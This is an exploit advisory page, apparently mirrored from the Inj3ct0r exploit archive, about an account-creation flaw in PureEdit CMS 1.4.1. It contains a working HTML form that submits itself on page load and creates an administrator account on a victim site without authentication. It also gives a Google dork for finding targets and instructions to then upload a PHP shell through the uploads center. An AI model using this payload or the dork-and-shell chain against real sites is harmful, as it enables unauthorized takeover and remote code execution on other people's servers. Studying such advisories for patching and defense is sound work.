Home / os / win7

PureEdit 1.4.1 Account Creation Vulnerability

Posted on 23 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>PureEdit 1.4.1 Account Creation Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================
PureEdit 1.4.1 Account Creation Vulnerability
=============================================

# Exploit Title: PureEdit 1.4.1 Account Creation Vulnerability
# Date: 22/08/2010
# Author: pimpim
# Software Link: http://www.pureedit.com/download/index.php?version=1.4.1
# Version: 1.4.1
# Category:: webapps
# Google dork: intext:&quot;Powered by PureEdit&quot;
# Tested on: Linux
#
#The PureEdit CMS has got a design flaw that allows anybody to create admin accounts.
#Note: The default admin directory is called pe-admin
#Note2: When you have created your account, then you can go to 
#[admin]/centers/uploads.center.php and upload a php-shell

&lt;html&gt;
	&lt;body&gt;
		&lt;form action=&quot;http://[victim]/[admin-directory]/centers/accounts.center.php&quot; method=&quot;POST&quot;&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;id&quot; value=&quot;0&quot;/&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;title&quot; value=&quot;hack&quot;/&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;hack@exploit.org&quot;/&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;website&quot; value=&quot;http://www.inj3ct0r.com&quot;/&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;username&quot; value=&quot;hacker&quot;/&gt;
			&lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;passwd&quot;/&gt;
		&lt;/form&gt;
		&lt;script&gt;
			document.forms[0].submit();
		&lt;/script&gt;
	&lt;/body&gt;
&lt;/html&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :